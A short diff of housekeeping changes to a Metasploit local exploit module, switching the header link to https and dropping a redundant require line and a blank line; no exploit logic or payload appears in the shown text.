@@ -1,9 +1,8 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
 require 'msf/core/exploit/powershell'
 
 class MetasploitModule < Msf::Exploit::Local
@@ -46,6 +45,5 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::NotVulnerable, "No powershell available.")
     end
   end
-
 end
 
